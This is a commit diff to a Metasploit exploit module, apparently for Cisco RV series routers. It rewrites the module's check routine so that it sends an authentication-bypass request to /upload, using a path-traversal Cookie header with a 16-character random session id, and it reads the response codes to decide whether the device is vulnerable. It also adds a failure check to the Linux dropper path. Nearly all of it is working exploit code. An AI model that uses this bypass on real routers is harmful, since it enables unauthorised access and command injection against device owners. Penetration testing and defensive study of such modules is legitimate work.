Rewrote check method to only abuse authentication bypass. Added additional status checks.
This commit is contained in:
parent
036ed7f467
commit
79b1801a4f
|
@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
# sessionid utilized later needs to be set to length
|
||||||
# Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
|
# of 16 or exploit will fail. Tested with lengths
|
||||||
# Test to see if router is responding and possibly vulnerable
|
# 14-17
|
||||||
res = send_exploit('id')
|
def generate_session_id
|
||||||
|
return Rex::Text.rand_text_alphanumeric(16)
|
||||||
return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
|
|
||||||
|
|
||||||
# Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
|
|
||||||
return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
|
|
||||||
|
|
||||||
# Vulnerable versions will respond with 301 Moved Permanently in body of response
|
|
||||||
if res.body.include?('<head><title>301 Moved Permanently</title></head>')
|
|
||||||
return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
|
|
||||||
end
|
end
|
||||||
|
|
||||||
CheckCode::Safe('The target did not respond with an expected payload.')
|
def check
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => '/upload',
|
||||||
|
'headers' => {
|
||||||
|
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
|
||||||
|
}
|
||||||
|
}, 10)
|
||||||
|
|
||||||
|
# A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file
|
||||||
|
# creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
|
||||||
|
# The firmware containing this authentication bypass also contains the command injection vulnerability that will be
|
||||||
|
# abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
|
||||||
|
if res.nil?
|
||||||
|
return CheckCode::Unknown('The device did not respond to request packet.')
|
||||||
|
elsif !res.nil? && res.code == 405
|
||||||
|
return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
|
||||||
|
elsif res.code == 403
|
||||||
|
return CheckCode::Safe('The device is not vulnerable to exploitation.')
|
||||||
|
else # Catch-all
|
||||||
|
return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def execute_command(cmd, _opts = {})
|
def execute_command(cmd, _opts = {})
|
||||||
|
@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
if target['Type'] == :linux_dropper
|
if target['Type'] == :linux_dropper
|
||||||
|
fail_with(Failure::Unreachable, 'The target did not respond') unless res
|
||||||
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
|
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
|
||||||
begin
|
begin
|
||||||
body_json = res.get_json_document
|
body_json = res.get_json_document
|
||||||
|
|
Loading…
Reference in New Issue